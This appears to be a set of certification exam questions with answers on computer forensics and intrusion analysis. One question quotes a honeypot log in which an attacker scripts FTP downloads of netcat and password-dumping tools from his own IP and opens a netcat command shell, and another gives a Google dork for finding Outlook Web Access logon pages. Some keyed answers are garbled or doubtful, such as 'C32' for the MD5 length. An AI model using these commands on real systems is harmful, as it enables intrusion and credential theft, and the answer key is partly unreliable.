Topic 1: Exam Pool A
The newer Macintosh Operating System is based on:
A. OS/2
B. BSD Unix
C. Linux
D. Microsoft Windows
Answer: BSD Unix
A suspect is accused of violating the acceptable use of computing resources, as he has
visited adult websites and downloaded images. The investigator wants to demonstrate that
the suspect did indeed visit these sites. However, the suspect has cleared the search
history and emptied the cookie cache. Moreover, he has removed any images he might
have downloaded. What can the investigator do to prove the violation?
A. Image the disk and try to recover deleted files
B. Seek the help of co-workers who are eye-witnesses
C. Check the Windows registry for connection data (you may or may not recover)
D. Approach the websites for evidence
Answer: Image the disk and try to recover deleted files
The following excerpt is taken from a honeypot log. The log captures activities across three
days.
There are several intrusion attempts; however, a few are successful.
(Note: The objective of this question is to test whether the student can read basic
information from log entries and interpret the nature of attack.)
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
From the options given below choose the one which best interprets the following entry:
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
A. An IDS evasion technique
B. A buffer overflow attempt
C. A DNS zone transfer
D. Data being retrieved from 63.226.81.13
Answer: An IDS evasion technique
You are a security analyst performing reconnaissance on a company you will be carrying
out a penetration test for. You conduct a search for IT jobs on Dice.com and find the
following information for an open position:
- 7+ years experience in Windows Server environment
- 5+ years experience in Exchange 2000/2003 environment
- Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting software are required
- MCSA desired, MCSE, CEH preferred
- No Unix/Linux experience needed
What is this information posted on the job website considered?
A. Social engineering exploit
B. Competitive exploit
C. Information vulnerability
D. Trade secret
Answer: Information vulnerability
Which of the following should a computer forensics lab used for investigations have?
A. Isolation
B. Restricted access
C. Open access
D. An entry log
Answer: Restricted access
Meyer Electronics Systems recently had a number of laptops stolen out of their office.
These laptops contained sensitive corporate information regarding patents and company
strategies. A month after the laptops were stolen, a competing company was found to have
just developed products that almost exactly duplicated products that Meyer produces. What
could have prevented this information from being stolen from the laptops?
A. EFS Encryption
B. DFS Encryption
C. IPS Encryption
D. SDW Encryption
Answer: EFS Encryption
With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.
A. 0
B. 10
C. 100
D. 1
Answer: 0
You are running known exploits against your network to test for possible vulnerabilities. To
test the strength of your virus software, you load a test network to mimic your production
network. Your software successfully blocks some simple macro and encrypted viruses. You
decide to really test the software by using virus code where the code rewrites itself entirely
and the signatures change from child to child, but the functionality stays the same. What
type of virus is this that you are testing?
A. Polymorphic
B. Metamorphic
C. Oligomorphic
D. Transmorphic
Answer: Metamorphic
Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file?
A. Sector
B. Metadata
C. MFT
D. Slack Space
Answer: Slack Space
How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?
A. 128
B. 64
C. C32
D. 16
Answer: C32
You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet. What search string will you use to locate them?
A. allinurl:"exchange/logon.asp"
B. intitle:"exchange server"
C. locate:"logon page"
D. outlook:"search"
Answer: allinurl:"exchange/logon.asp"
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization
vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not
normally have the right to run scripts. The attacker tries a Unicode attack and eventually
succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a
malicious user to construct SQL statements that will execute shell commands (such as
CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists,
and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS
query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2k
B. There are two attackers on the system - johna2k and haxedj00
C. The attack is a remote exploit and the hacker downloads three files
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
Answer: The attack is a remote exploit and the hacker downloads three files
The log clearly indicates that this is a remote exploit with three files being downloaded and
hence the correct answer is C.